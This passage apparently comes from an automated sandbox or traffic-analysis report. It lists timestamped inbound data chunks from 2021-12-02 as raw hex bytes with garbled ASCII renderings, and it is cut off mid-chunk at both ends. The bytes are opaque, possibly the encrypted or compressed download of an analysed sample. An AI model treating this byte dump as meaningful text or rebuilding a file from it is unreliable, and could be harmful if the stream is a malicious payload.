83 a0 8b ee 02 73 b9 9c 2e 70 e5 a6 d0 81 74 92 36 03 19 1a e8 49 66 48 3a d3 80 60 f0 34 5c c8 92 Data Ascii: dB\|&"D}3S~s`$B#!.iel}(fZ[ML)_^b!RW2ckIB3Gu/<]%T\FP,tjC,)':CyRKaHPFzF(FPs.pt6IfH:`4\
2021-12-02 06:09:37 UTC	50	IN	Data Raw: c3 95 b5 26 61 38 14 9a 03 92 a9 34 03 6d ea 46 0f d6 92 ee 82 6e a8 a6 40 3e 4a 9f 3c 53 78 0a b6 27 74 93 78 4f 25 19 1b 93 24 24 01 92 be 58 f4 71 ca 5f 65 35 48 64 cb d3 cd 70 37 de 9a ff 5f 8e 7d ef 20 95 59 29 65 49 f7 81 6f 79 ee 8f f5 68 e3 9c 0d 8d f7 ca a3 20 be 06 e0 d3 e3 12 ff a1 1e ca 2b cc 09 dc 75 43 e0 aa 44 9e c3 b7 ee 16 e1 7e b5 46 01 4e 7d 03 3a dc 3c a2 29 ce 60 b1 24 b6 7a 8f 91 7c 14 1b a9 b7 a6 ba dd eb d9 57 3b 86 65 4a d1 e7 4f c6 3f ad af 64 e0 e4 19 b2 2f 4e 0f 46 d7 9c 4c c0 06 47 3f 30 6b d2 c3 bb 04 b0 a6 d5 d2 f5 90 a8 83 84 93 a6 10 cf 03 48 15 64 f0 a5 32 9c 83 0d e5 15 29 7f 9e 51 78 94 83 17 fd 35 95 01 7f 5a 16 cd 9c 66 ef 1a 59 5e 6e e3 89 9f 2f a9 df fd df 25 21 a4 99 c1 bf e7 4a 9b c6 50 1c 7b 30 c2 47 6e f8 65 c8 Data Ascii: &a84mFn@>J<Sx'txO%$$Xq_e5Hdp7_} Y)eIoyh +uCD~FN}:<)`$z\|W;eJO?d/NFLG?0kHd2)Qx5ZfY^n/%!JP{0Gne
2021-12-02 06:09:37 UTC	51	IN	Data Raw: ac b1 1e cc c4 ef a6 47 3c 8b ff 4c d1 d3 1c 06 4f da 1e 82 71 66 fd 04 e4 32 b5 11 e4 da c4 e7 61 c6 95 5d b6 75 32 ec ff 85 01 03 71 fa dc cc 50 87 d3 84 ec 27 b0 29 9b b5 13 c0 82 1d ad b1 18 ae a2 4c e7 4f 13 79 2e d8 e0 14 fe b2 bb e4 e7 59 d5 9e 77 22 0d 41 e1 22 f1 b8 d0 bb a1 9e 5b 2b 47 74 89 db b9 83 59 79 b5 9a 69 ad 00 af 60 29 33 e7 7d 40 6f 22 0b 71 d1 d2 f9 d5 3c 10 1b 61 8f 37 c3 39 92 67 bd b4 38 2a 8d ea 68 fb 12 95 4b 14 7b cb 4f 05 0f 2b 9e 55 9a b3 5d 9a 62 45 03 3c 86 af fc a5 55 89 9c 4e 84 40 1c a0 36 86 65 d3 d2 98 4c bf 5b bf 0f 8b a8 bb 27 aa d8 c9 06 d2 9e ca 72 68 a3 de db 10 26 ed 27 c8 d7 58 0b db d3 15 f9 1e e6 d6 0a 87 24 94 24 05 89 be 67 1d 6e 07 c4 c1 a2 2a 2d ae c2 0f 3d f8 8a 8f d4 43 8c f3 70 21 c2 3f 75 fb 3a 0b 80 Data Ascii: G<LOqf2a]u2qP')LOy.Yw"A"[+GtYyi`)3}@o"q<a79g8hK{O+U]bE<UN@6eL['rh&'X$$gn-=Cp!?u:
2021-12-02 06:09:37 UTC	52	IN	Data Raw: 8d 64 b7 64 29 8c 24 2f 46 01 5a 21 55 93 7f 46 a9 8e 66 77 61 cd 0c 55 11 4f b7 2a bb 16 53 2c 5f 80 ef 36 ab af 7e f2 e2 f2 2d 8e e9 ce f7 50 9b 9c 61 9e b8 37 02 66 c3 c4 d7 b3 4d 54 15 21 08 9b d2 0f b2 3c f4 2e 29 ae cd 08 08 d4 83 ab c2 63 7c ff 70 43 cc 47 64 0a d9 29 10 5b b9 ec 47 5c 9c 3a 05 00 17 fd c2 e7 43 26 2c 2e fd 0c 47 0d 83 a5 66 d4 ae 1b f8 71 cb 9d a4 a8 6a a7 45 68 02 de ac c0 fa 2c 42 24 84 a1 b9 53 25 98 86 72 74 90 5d 76 2f a0 5a 07 b9 2d e0 2d e0 d3 1c da 15 a5 9c 32 c3 44 96 99 01 51 84 2b ea 61 14 f6 6a 3e 06 f2 1d ae a8 7f 68 88 11 1f eb 8b f7 f1 7e 09 d2 f1 f9 8f 80 3b 77 da a8 c3 2f 6e a0 d3 83 07 05 6b 38 c9 fa 9a 33 da da a6 10 b9 a6 62 a8 7c 92 7b 0c 93 6d 3b 9b eb 3a e0 c9 45 59 7b d0 a7 34 c3 9f b7 49 84 a3 78 04 e3 45 Data Ascii: dd)$/FZ!UFfwaUO*S,_6~-Pa7fMT!<.)c\|pCGd)[G\:C&,.GfqjEh,B$S%rt]v/Z--2DQ+aj>h~;w/nk83b\|{m;:EY{4IxE
2021-12-02 06:09:37 UTC	54	IN	Data Raw: 09 34 3f d8 ed 3b 48 6a 94 8b 98 08 9c 29 cf bf 85 59 1d d0 9d 70 6e 19 83 ba 88 7d aa 3f 2c 56 64 61 ec 9f a3 e3 03 62 c4 d9 bb c8 a2 31 9f f2 f2 5d 9d 75 db fe 95 2e 72 ec a7 63 f3 9c 29 69 de a3 5f 44 f2 3a 3b 3a c8 42 bf 74 d5 90 55 fd 54 a0 aa d8 3b 32 a5 f5 21 82 6e c3 13 ec ba 52 32 5b 73 9b da b8 eb 46 a7 1c 53 af 01 92 ab 23 7b 28 80 9b 19 f2 fd 82 d1 5c 58 d4 38 92 9e 02 6f 9e b0 98 8b 9c 46 1c 6a 74 e9 f8 93 e0 7c 0d 0f 48 92 7a b7 db 42 01 f5 5e 32 87 80 af 95 0a 74 9f f0 54 7a c0 3b a1 2d 4a 36 1f 8f 53 04 ac 04 2d 18 e3 18 05 ab 70 36 fd ff c0 99 a7 d3 4a 6c bb 6a de be 96 0d ed d5 8b ae 7c 72 5b a4 f3 7b 2e 7f ce 92 8f 37 ab f9 ee 99 6c c6 17 f4 9f 74 74 19 4f 15 5e ce 08 c3 9d ce 47 78 64 17 f0 5b fa 60 c9 a5 86 28 7a a1 8f 7b 04 ab 13 0c Data Ascii: 4?;Hj)Ypn}?,Vdab1]u.rc)i_D:;:BtUT;2!nR2[sFS#{(\X8oFjt\|HzB^2tTz;-J6S-p6Jlj\|r[{.7lttO^Gxd[`(z{
2021-12-02 06:09:37 UTC	55	IN	Data Raw: ac 58 0f dc 96 02 d3 ab 12 57 04 4a 6d ea f4 e1 20 da ed 5d 71 af 9a 77 30 8e 0d 56 aa c1 d9 ea c0 56 82 17 5d e1 88 e4 4e da 9e 56 9f df ca b1 35 d8 c0 0b 88 94 c9 16 a3 79 d1 eb 60 94 5e ab 69 c9 ae 4b 97 e2 25 bc 6f 20 d2 10 b7 47 c5 3b 4a 61 20 ff 5c 3a 46 a2 78 07 58 73 87 8a 4d 98 8b 29 56 1a e8 7f 2f f1 6f 03 73 33 78 a4 bc 99 98 1c 79 61 ae 4c 75 aa 54 c8 e4 e2 4b b2 c4 80 1d 4f 81 31 0f ff 23 7e 7c 2b fd 3a 9b 19 9d 5e b1 76 36 9b b0 51 8d 38 57 cf fc f2 54 11 89 7f 9a 96 5f e9 ed 5e ca 4f a6 73 3a 61 3c c0 78 36 28 57 91 e9 d5 86 58 2d 1c 2a a0 14 8d 8e a0 74 d6 83 d8 eb 41 f6 f0 6d 2e c7 79 0f 62 81 d5 b2 0c 43 af 7e b3 62 19 1f f4 30 1e 43 fb 0f 11 51 f0 73 50 a7 4d 88 b8 31 56 8b dd 7d 18 e0 1b b0 22 57 78 ce dd 5d ef 6a 58 e1 95 54 50 df 1d Data Ascii: XWJm ]qw0VV]NV5y`^iK%o G;Ja \:FxXsM)V/os3xyaLuTKO1#~\|+:^v6Q8WT_^Os:a<x6(WX-*tAm.ybC~b0CQsPM1V}"Wx]jXTP
2021-12-02 06:09:37 UTC	56	IN	Data Raw: ac 48 3f c3 fe af 21 27 11 d1 31 e3 5a 49 3b f4 3f 2a 30 67 96 5f 54 22 2a 74 19 68 9b 25 5b 19 ec 8d 26 6e 54 08 0c bb 7c 61 7a e8 c6 1e 8b 67 8c ea 29 09 b2 5a bb b6 6d c6 07 f4 47 80 7b 56 7e 82 43 c8 a4 77 c0 75 00 29 9f f2 6a 7f 2f 5d 2c 45 a5 a8 0c 76 05 64 db f5 08 98 ee df c1 49 11 b4 84 a4 6d c3 d6 a7 50 25 3f 35 f3 4f 5f 77 94 d1 f9 fd b2 39 1b 20 75 f3 0a 63 2a 55 7b 41 6a 76 b6 b7 a2 e2 4b 81 13 fd 76 29 75 94 5c c1 bd c9 26 29 c3 3a c8 e3 a0 81 17 cb aa f4 96 bf 13 11 ff ff 09 6e a8 8c 72 a9 51 30 49 ed c7 f5 a1 61 94 cc 92 e2 a1 9e b3 04 bb 57 40 da df 22 04 5a cb ca 9a 1a 98 d3 77 78 b1 e1 c9 c9 dc d9 87 c6 77 ec e5 b6 92 ba 63 45 17 21 90 c1 94 90 52 a4 dc 86 a5 dc 2b 58 ad 28 c1 15 4f 97 e3 74 ca ed c6 2a bd e3 98 92 6a 38 d3 cb 76 06 c2 Data Ascii: H?!'1ZI;?0g_T"th%[&nT\|azg)ZmG{V~Cwu)j/],EvdImP%?5O_w9 ucU{AjvKv)u\&):nrQ0IaW@"ZwxwcE!R+X(Otj8v
2021-12-02 06:09:37 UTC	58	IN	Data Raw: 31 89 24 24 a9 23 86 e8 bc 75 aa c1 37 fb 13 5c 76 47 80 d7 22 4b aa 50 55 bc 73 41 8f 89 aa 1e 25 fd e1 a4 bc da 43 21 82 25 ad 18 97 fc 80 f0 0e 31 da c5 8c f9 ca 9d ef 01 bc 07 e6 b7 72 4d 7a dd 8e bd 0e c3 99 d9 5a d6 24 d4 0d 39 1e 04 10 12 1d 38 ae 46 dd cf 53 c0 70 89 fe f2 4f 9e 3b cc bc 8e 0c bc 08 09 75 0a 66 59 c2 33 d6 6a 96 ed f8 f4 3b 4f 2c d4 fe 88 29 e6 e9 d0 e4 6e 5a 9c 0c a0 3a 6b b8 67 5a c2 ec 39 5c 1b 98 6f 0c 89 39 45 0c 5a 5f 53 13 0b aa 05 dc 51 2d df f2 ff 17 f4 f3 d8 67 e5 d0 e8 5e 13 0f 3a a2 6e 65 dd 23 e7 03 cb 04 32 f2 99 bf e5 f3 f3 d2 4d 74 3a 3b 77 22 ff b0 aa 5f e8 b3 4e ea 56 18 bc 8c ab c1 1f 0b 5c d8 42 6c e6 cb 31 2b 53 c2 83 6e 1c 48 39 cd 4d 93 7b e1 12 28 15 b8 8c 34 0e 6c 61 4d 6f e3 3b 54 3a 1f ab ed a1 f7 24 59 Data Ascii: 1$$#u7\vG"KPUsA%C!%1rMzZ$98FSpO;ufY3j;O,)nZ:kgZ9\o9EZ_SQ-g^:ne#2Mt:;w"_NV\Bl1+SnH9M{(4laMo;T:$Y
2021-12-02 06:09:37 UTC	59	IN	Data Raw: 95 86 e2 d5 fd 70 b8 9b 74 62 87 c3 e8 f7 79 88 35 b9 ef 4b 9e ec 32 62 05 39 08 ef 02 1c 97 cb 95 5c 41 b0 ef 6a 2f 75 c5 c8 0d 0b 13 97 9b 14 e3 c4 32 ad 92 d3 2a f5 d4 ab 63 b3 f1 83 ed b9 9f 86 a2 c4 ef 4d f4 28 70 a1 c9 e5 6c 8b a9 44 1a 67 77 2d cf cb 5f 11 a8 15 a9 02 eb b7 57 9e 71 e8 ff 47 96 1c 61 cf b6 58 5d 62 81 52 51 8e bf 6b 6f 8b c7 91 9c 25 d2 00 38 4c 3b bf 93 1f 6c d6 e0 60 2f 9b a9 25 db 73 a5 95 38 8a 23 b3 73 6a b7 24 45 9d c7 4b 51 98 74 8d 42 5a 1b d3 57 28 44 63 02 9c 67 53 01 14 6c be 93 a9 f2 24 7e 91 46 5c c1 c4 2a 65 7f 0c 95 c7 01 52 ec 27 64 e0 cf 92 11 63 df 75 77 bc 9a fa 4d bc 77 00 08 11 89 d4 91 9e 8e a1 81 b9 fd 70 5b 83 2d 84 8e 72 7c ff 70 e5 88 e7 9b a8 a3 ae 6c 60 76 1b 3b 62 96 7d ea 0f b3 68 50 dd 2e 9a 53 83 96 Data Ascii: ptby5K2b9\Aj/u2cM(plDgw-_WqGaX]bRQko%8L;l`/%s8#sj$EKQtBZW(DcgSl$~F\eR'dcuwMwp[-r\|pl`v;b}hP.S
2021-12-02 06:09:37 UTC	60	IN	Data Raw: d1 e2 6e 85 02 34 6d 81 7b 32 c1 11 44 84 0a e5 21 df 2f 79 e7 09 18 31 84 6c c6 f9 f0 f8 d6 90 a4 7d c9 d5 9c b5 94 23 8a b4 9f 86 b7 94 e6 e2 e5 c2 13 49 4d f8 00 4a 68 88 11 79 54 b1 d7 9c bc 4d b2 d0 5f cc 1b 90 43 eb e6 47 35 b3 03 e8 8c f1 34 61 ac b5 6f ee ba 42 71 fd 6d a9 e6 82 1d ad b1 29 77 0f 0f 05 f5 5c 41 5c 38 ec e0 15 b0 cc 1d 81 d0 d1 9b 4f 88 f6 11 b1 f7 65 5c 29 8a 05 ea d6 56 ed 60 02 ba b3 5f f2 79 b5 cb c5 2b 64 05 15 21 0e c4 f3 44 45 55 ac 73 b5 e2 d2 ac d7 12 ca e8 d7 5d df a0 cb 48 33 86 52 1d d8 95 7b 83 38 90 dd 8d 9a de b4 1c 65 ca 73 1a dc 27 05 a1 af cf 3f 3a b7 70 51 68 5c ff 2e aa 8a a0 10 3a e2 67 00 8f b8 ab 7b c9 ce 12 97 6c 3b 34 b9 2d 79 08 01 c9 5f 0d bf 6c 63 ec 77 85 fc b8 51 da 2d 83 52 d5 a5 af d6 82 80 96 ac 48 Data Ascii: n4m{2D!/y1l}#IMJhyTM_CG54aoBqm)w\A\8Oe\)V`_y+d!DEUs]H3R{8es'?:pQh\.:g{l;4-y_lcwQ-RH
2021-12-02 06:09:37 UTC	61	IN	Data Raw: 17 36 d5 56 2c 0e f4 68 74 29 90 c3 e8 f2 15 4f b8 11 26 f2 1c 8b 1a 03 63 22 5c 76 0a 5e 2f 3f b0 4b dd 04 7c 48 ee e2 8c 0c 2a 46 01 80 b6 a1 b9 5e 4d d3 28 45 cc aa 41 bb d8 b7 eb dd 6f 24 22 45 94 61 8e 46 5d fc 3a 4c 9e b0 d1 6c 66 81 d7 52 af c8 75 a4 c4 84 57 8d 70 0b 28 8b c2 20 ab b9 24 7c b3 26 56 45 a8 8e 6b d2 ab 7b 15 4c 23 16 93 b8 e8 f6 f8 70 e5 80 f0 6f c9 a6 18 ef 4c 78 c8 c5 9d 15 39 bc 97 eb 89 60 79 13 13 e0 b2 47 73 f7 82 e6 fd 5e 6e 79 14 94 39 91 a5 1e 55 2e 36 7d 7c 3a 64 a3 0b ab 66 9c 23 9f 71 99 cc 4c 20 82 62 6b 37 98 97 b2 31 48 f7 df d0 36 ca cf cc eb 02 9f c9 01 ac 38 fc a9 d8 dd fd 47 94 07 51 39 15 33 0a e6 30 15 43 5b b7 af 4d 30 f0 3a 2c 5a 88 4c 53 97 88 ae 3d af 4e a2 b2 8f 06 ae c1 e4 6b bb e7 83 5f 5b da 16 7c 44 e8 Data Ascii: 6V,ht)O&c"\v^/?K\|H*F^M(EAo$"EaF]:LlfRuWp( $\|&VEk{L#poLx9`yGs^ny9U.6}\|:df#qL bk71H68GQ930C[M0:,ZLS=Nk_[\|D
2021-12-02 06:09:37 UTC	63	IN	Data Raw: 51 97 b7 35 34 13 e8 dd 0c 61 a7 11 9e 47 59 fe a1 50 76 13 5a 45 bb 7c 6f 35 02 8e cd 84 b2 6d e9 34 69 15 a7 18 71 79 9b 80 1c 88 fc 35 f1 45 16 44 33 2d e6 73 bc 0f 70 c8 11 02 56 88 7d aa 0d 16 be 76 3f 44 9f cf fc 11 5a 9b ce 2e 67 59 ea f9 99 d9 5c 34 e8 69 aa 5f 99 03 5d fe d2 2e 0b d9 13 43 5d ca ba 5e b0 e2 9a 62 54 40 63 c4 a7 f9 ea ec 17 65 71 8a 85 c0 ca 9e 8a 0d c5 18 d0 10 8e 36 05 c9 78 4f 6d c6 d0 02 af 8c 15 1a 49 05 52 46 92 05 22 01 c6 1f 3e e6 f3 6b d6 91 2b 95 3e 86 8d 31 8a 31 2c ec 1f f3 02 af d6 42 cf f8 e6 fe 0f 35 ca d7 ce db 77 3b 74 33 b4 6b 12 68 71 d7 ad 96 8e d7 f3 32 9e 82 90 1a 1c 5c c7 6e 17 47 dd c5 2e fa 3f cf a6 42 6a 65 3f cb db b3 f3 25 76 8d d5 e9 a1 5d 3d 79 ef 52 d8 2f cb 19 58 f9 52 6c 05 05 c9 27 fa c5 4a 81 ee Data Ascii: Q54aGYPvZE\|o5m4iqy5ED3-spV}v?DZ.gY\4i_].C]^bT@ceq6xOmIRF">k+>11,B5w;t3khq2\nG.?Bje?%v]=yR/XRl'J
2021-12-02 06:09:37 UTC	64	IN	Data Raw: cd 60 ac 2b 13 f4 3a 56 83 e8 1d f6 8b f0 d1 15 df 95 ff 21 9d d0 29 08 96 97 80 2f 00 6a 78 85 44 a8 e2 5c 8e 73 5e e9 c6 b6 f7 6e 5f f4 1d 0a ae 27 a0 20 32 b9 cd d8 3a 10 f8 4c 7f 29 2a 38 b5 22 a8 47 c3 7c 12 df dd 9e 1b 7b bd 8f 95 a9 c8 2c b5 0e 37 c0 7f 88 68 f4 7f e5 f8 a5 df 71 e1 38 bc 91 c5 89 37 ac 87 7c 98 2e 07 41 59 dd ae 9e 55 a7 db 4a ff 65 d3 e6 e1 77 07 ee 83 6e 85 ce 8e 63 a0 2b 90 94 44 98 50 41 cc 4c 06 cb 06 4a c5 05 28 38 89 85 82 75 aa c1 91 4d b6 3f 2b af 93 68 2d 2f 10 e7 14 e2 f8 6b 94 63 b0 bc 8c a7 33 f6 bb 48 32 72 77 7a 3c 74 cf 1b 8e 6b 97 c8 ea ae ca a7 a0 ed 36 e6 8c 99 e4 0b e1 84 3f 5d b0 72 8a b2 47 63 79 da ad f3 d5 a0 a2 41 35 02 77 b5 e5 69 bc a9 25 b0 9a 2a dd 91 c1 c4 1e d5 1b 67 a7 fe b2 8c dd 33 b1 97 cd 36 7f Data Ascii: `+:V!)/jxD\s^n_' 2:L)8"G\|{,7hq87\|.AYUJewnc+DPALJ(8uM?+h-/kc3H2rwz<tk6?]rGcyA5wi%g36
2021-12-02 06:09:37 UTC	65	IN	Data Raw: 40 34 84 b8 47 15 3c b9 54 70 8a f1 b0 35 61 b1 c6 dc 0e 2f 85 d9 b4 df cc ed b1 c5 5b a7 cc 7a da 69 21 fa 9e 14 f5 93 86 82 be c1 c2 33 29 01 c1 a2 24 49 06 36 4d a3 b2 38 3a 07 79 f8 e0 7c 40 7a c9 8a 04 03 ce 8f 23 22 22 80 2c 60 76 c8 95 12 b7 90 99 8f 8f 42 c5 d5 3f 38 5b a6 f8 be a1 e2 20 4b eb 69 65 16 10 0e 01 aa 32 f1 33 96 75 8e 51 fd 48 3c de 99 82 63 ed 51 88 de ec 6c da d1 a4 1c d5 bf 12 19 6e 79 3e 39 60 c1 b8 71 76 b7 62 82 64 b1 74 75 d9 d0 fa 97 55 7e 79 27 de a6 52 c5 1b 75 4a 5d f5 99 ae a4 89 db ad 0e 68 a3 3e 3d 22 c3 94 4d bf 57 a0 79 a9 73 ab b4 17 69 48 9e ec e8 d9 38 b5 07 ae b4 7b d7 a5 46 60 0d b5 41 e2 26 b6 b9 75 5f 36 6c 28 ff 4c c6 5f ef 62 8e 5a 7c 2b de 54 5f a9 9e e9 b7 57 99 69 60 b0 40 43 14 d5 5a b6 a6 d6 9a 44 d0 4c Data Ascii: @4G<Tp5a/[zi!3)$I6M8:y\|@z#"",`vB?8[ Kie23uQH<cQlny>9`qvbdtuU~y'RuJ]h>="MWysiH8{F`A&u_6l(L_bZ\|+T_Wi`@CZDL
2021-12-02 06:09:37 UTC	66	IN	Data Raw: 24 b4 8d c6 4e 24 89 58 84 a6 22 b5 33 ee 4e 74 5e 04 52 13 db c9 cd f4 d1 55 c1 dd be 74 df d5 4b 34 69 59 9b 6f 30 be e1 07 6b 32 ff dd bc 92 38 7c 3d 61 4f 64 70 2a 04 ff 6d 01 c7 b5 43 21 c7 28 9a 74 76 d4 e5 46 4a 14 ec 12 a2 60 8f 61 90 53 67 4c a2 cb 9d 95 1d ad 54 3d ea 01 c5 f5 df 02 6c a0 d8 68 45 f2 b0 10 57 54 e3 bf 74 83 4b 26 14 a8 56 85 d9 9d 93 96 35 a6 9d 22 a3 9a d1 10 26 fa 80 9f 87 77 17 6b d2 15 85 da ea ad 41 06 c7 c1 5f 3a 82 05 bc c4 93 7c b5 de a3 82 85 c3 70 09 f8 c6 a8 6f 03 a9 97 f2 02 53 16 83 07 48 03 d2 8f 23 22 1a 70 cc 76 4f 53 4e b5 a6 40 db ca 6c 39 69 22 73 1c 40 29 ba 9f ac e3 20 fc ef 69 65 a1 52 23 08 ab 32 06 33 9e d5 6d 13 d4 4d 3d de be c2 a4 a9 b2 ca eb ed 6d da 66 17 98 f1 78 50 28 93 79 3e 26 60 06 fc 92 34 8a Data Ascii: $N$X"3Nt^RUtK4iYo0k28\|=aOdp*mC!(tvFJ`aSgLT=lhEWTtK&V5"&wkA_:\|poSH#"pvOSN@l9i"s@) ieR#23mM=mfxP(y>&`4
2021-12-02 06:09:37 UTC	67	IN	Data Raw: cd 4c 2f 8c 48 ac 17 47 eb bc 05 21 ba 5f b2 32 73 ae 10 cc c6 cd 7b 62 c0 02 50 e5 61 05 b4 d2 40 70 4d e1 b3 cb ad 1e 59 4e 8a f3 d5 03 cf a2 1a 70 8b 20 b2 86 a9 27 c5 16 a5 6b 46 c6 50 b3 4a b4 62 ba 56 82 44 b3 e4 db 1b 2b b9 0f 8b 1d 76 d3 de b7 03 96 80 7e a4 bb fc dd 3f 7e dd d8 dd e6 3a 6d 0f 51 9f a9 c7 72 c6 fa e9 d4 a6 e6 aa 49 b9 b5 9e 1a a8 5e af 3b 96 88 10 ea 64 7e c3 ce b4 78 2c 14 71 96 44 98 0f 70 ff f2 42 fe 5a 62 af 0b 55 2a 61 87 fe 8a 55 bd 0c 82 b0 5c 0a 16 80 d7 2c 90 56 26 e8 1d 73 36 4c ff b0 bc bf f1 35 1e d7 24 4e 8d 2b 2b 94 d5 d7 bf 0c 54 3d 33 db 24 47 fb 63 b8 3d 87 4a b5 9c 4e 51 cc 6c 5b 81 5c 5a 28 60 e8 0d e8 a5 9c df 5e 97 49 9e 1d 88 8a a6 d3 6f 22 97 8d 13 10 4c 91 29 17 f7 6f 1c b5 35 25 56 1c 62 bf 64 51 20 ea 7d Data Ascii: L/HG!_2s{bPa@pMYNp 'kFPJbVD+v~?~:mQrI^;d~x,qDpBZbU*aU\,V&s6L5$N++T=3$Gc=JNQl[\Z(`^Io"L)o5%VbdQ }
2021-12-02 06:09:37 UTC	68	IN	Data Raw: c5 ca 8c a5 06 7d df 56 14 27 8a f5 8f 35 61 ea 25 a5 8a 37 af 1a 8b 53 73 04 5c 8a e5 7b 15 0f d2 d9 1a 22 34 15 e2 5e 4e 8d c8 ed 7c 82 3e c6 31 d9 98 7a c6 68 5e ae d1 3e 32 3b d3 52 71 09 27 ce ea f7 e8 38 0f 50 9e ca 86 0a db 77 91 d1 92 64 ab 39 91 0c e4 97 7e e9 1b c7 f7 ea a5 99 98 11 5a d8 6d a1 e8 d1 95 a6 77 28 31 74 3c 73 c9 23 d4 02 5d 29 02 be 7d e0 29 9a 88 91 65 aa ae e4 c3 13 b4 8c ac d0 63 f3 c4 ea 9f 3e fd 4e fc b9 9b 4d cb 11 d7 ce 02 e8 f4 7e 50 d8 0d 3a 66 22 b9 cd 9d 7e 3f a6 1b 36 bb 18 42 5b a1 8f 61 67 84 c1 18 9a 5b f7 c6 12 1a e2 06 bf 04 df 63 51 46 aa 48 92 d9 08 d2 dc a3 8f 7d c7 3c e9 f5 86 a2 a1 21 c2 cc 92 db 48 8b b0 93 24 a7 c1 26 34 5c 21 4d 24 f7 65 8f 1b e8 56 9f b8 fe 9a c9 4e ef 78 39 ad a3 6e ca 67 2a b1 c2 14 08 Data Ascii: }V'5a%7Ss\{"4^N\|>1zh^>2;Rq'8Pwd9~Zmw(1t<s#])})ec>NM~P:f"~?6B[ag[cQFH}<!H$&4\!M$eVNx9ng*
2021-12-02 06:09:37 UTC	70	IN	Data Raw: 51 12 48 50 32 c8 59 61 7f e3 ca 72 b9 3f e4 b3 92 b8 fd 07 0d f9 19 57 2c 1a 1f 89 30 e6 e5 af 73 b9 cd d8 71 a7 17 73 2e 61 44 9b 75 aa b7 8d 62 ba 31 07 58 67 7e f6 35 80 5e 47 0a 8f b7 2b fd b0 36 0a 23 9a a0 62 29 8c 8d 57 b6 d7 c2 ba 6e a5 54 51 71 7c e6 a2 4e a2 a6 49 94 4a 9d 80 40 e2 b0 38 5b 3e e6 51 5a ef c5 79 c5 59 71 73 65 68 b6 31 3e 8b b5 68 16 43 56 8d 6d 0a eb 6b 6e aa d3 72 75 b7 0c ed e0 7e b3 c4 5f 2f 42 68 30 37 e1 ad a7 eb 2b 95 73 32 b7 1f fd 5e ff 83 40 76 f3 1f 6e 02 a0 51 65 6d a5 e3 9a 62 57 0d e1 ab f9 0a 8f 37 b4 ce e5 d2 7c c2 33 5c 0b c0 83 a3 9c b4 2b 71 fe 4a 3e 32 ac e5 6c fb c9 14 8d 7f ee 3d 78 45 d1 de a2 23 bb fc 07 d9 06 8c 52 de c5 87 26 54 48 67 a9 58 8b 88 e4 ec 43 db dd 97 e1 18 94 4b a5 60 24 ff 11 3a 32 65 24 Data Ascii: QHP2Yar?W,0sqs.aDub1Xg~5^G+6#b)WnTQq\|NIJ@8[>QZyYqseh1>hCVmknru~_/Bh07+s2^@vnQembW7\|3\+qJ>2l=xE#R&THgXCK`$:2e$
2021-12-02 06:09:37 UTC	71	IN	Data Raw: f8 84 22 fd b5 9d 51 5d 99 67 be 7d 09 ed fc 0d 91 64 9b da ac 4b 64 b8 78 7f 0b d5 79 3e 5a a4 d9 e5 75 a6 84 73 17 9b 06 c8 55 01 5e 7f c3 9b c7 79 88 fc 2d 7c 02 61 c0 bf 5d 3f d9 02 a5 02 f4 57 8c 6a a3 42 f9 72 17 13 df b1 73 de 6a 02 04 9d ab f6 8b 95 38 62 49 4c 20 ca 3d ab 15 77 42 f4 e1 f5 ef af 23 c9 b8 59 1f ee 29 8c 57 34 b1 4b 67 53 72 27 29 cf 52 c6 13 35 22 4a cb 51 f6 f0 a3 55 03 33 c2 06 ac 42 f6 16 cd bd fc 85 62 67 80 37 1e d3 55 fd 65 bf 6c d7 5c 6b af 91 8a a3 75 b3 85 fd dc a4 fd ab 90 fb ae b9 24 a1 69 6e 6f 14 b4 05 dd 88 0e e1 2d 30 bb d1 2a d7 44 7d 30 13 01 69 f5 98 cf 7a ef 90 4c ee 99 82 df 50 17 dc 54 71 98 f0 af 25 fc c3 c5 b0 d5 6b ce cb d9 c6 c1 fe f8 12 04 00 f7 84 4e ea ce ad 0b 2c 14 91 67 a7 d8 1b 9d f8 2b 18 37 bb 40 Data Ascii: "Q]g}dKdxy>ZusU^y-\|a]?WjBrsj8bIL =wB#Y)W4KgSr')R5"JQU3Bbg7Uel\ku$ino-0*D}0izLPTq%kN,g+7@
2021-12-02 06:09:37 UTC	72	IN	Data Raw: 2e 5d d9 d4 72 14 0d 1e fc b1 75 c0 90 ff 8d ef b8 89 fe bf 4f 9e 3b de bc 8e 00 bc 08 09 6b 34 85 78 4e e2 f9 fc a8 0e df 47 09 68 3e 3b 32 37 ea 7e e5 21 c7 19 47 04 3d 94 3d 66 68 48 d0 fc 03 f5 cd b9 c1 c0 06 b3 2b aa c0 e1 08 4e a9 07 aa 05 c4 5d 13 3c f0 4d f8 38 6a 56 6b 02 c3 bb 7d 7c 1a b0 bc 81 b9 7c af 36 10 ac 2f 63 c9 e4 94 8e bd cc e5 a2 b0 83 23 3a a7 ae d6 a0 de 16 61 55 65 8c ad b0 c2 bb be 95 01 cd 10 41 5c 38 d4 c2 15 b0 e4 39 81 d0 f1 81 c1 98 b8 f9 d7 fd dc bc 10 5d 0b 8f db be 27 35 89 d5 f6 ab 05 27 3e 2e cb be 66 e4 dc fa 88 f7 c6 9b 57 b7 a7 41 83 d4 de 5c f4 7b d7 08 e9 51 1b 83 a0 55 d7 aa 66 16 c9 7a b7 56 84 a2 de 8a 75 12 63 ac 57 cc 67 c8 f3 d6 02 a1 db f3 dc 2f 3b ca d4 98 b3 33 93 7e 86 5c 3b 29 fe cd 17 bd be c2 77 60 d2 Data Ascii: .]ruO;k4xNGh>;27~!G==fhH+N]<M8jVk}\|\|6/c#:aUeA\89]'5'>.fWA\{QUfzVucWg/;3~\;)w`
2021-12-02 06:09:37 UTC	74	IN	Data Raw: af 6c d1 a9 db fe 25 68 f5 16 c3 bd 35 c8 8f 67 d3 24 9d dd d4 36 de 9a e0 ed a7 92 a1 20 3d 58 29 65 54 7d a4 80 37 2e ed 53 fd 4f bf 6c c7 6c 55 4c a1 26 70 5a 1b 85 fd 04 3a 64 dd 2a 55 7f 5e 0c 38 1f dc bf fb b0 26 ee 2e 9b e8 c2 34 88 fc 8d 42 56 92 04 2e 28 ce 60 9b 20 6e d0 b7 eb 7b 8c 6d c3 73 58 45 22 4a d5 f6 45 1f 13 07 1e 34 e4 75 dc 24 15 11 47 cf fb 22 08 e7 ec cb 6d ef d5 c4 11 c8 2f 9d 9d 81 56 18 9d f8 1b 44 09 58 79 c2 f5 3e f4 1f 7d f6 66 06 d5 e8 57 30 a3 3a d8 aa 3a 75 64 5c eb d3 5b e6 f5 95 98 62 ef 0d 9d 83 bc 2c ea 28 3f a2 fc cb e5 72 96 2b 04 e7 1f 2f 78 b0 bd cd ae 80 4b 46 46 f6 a9 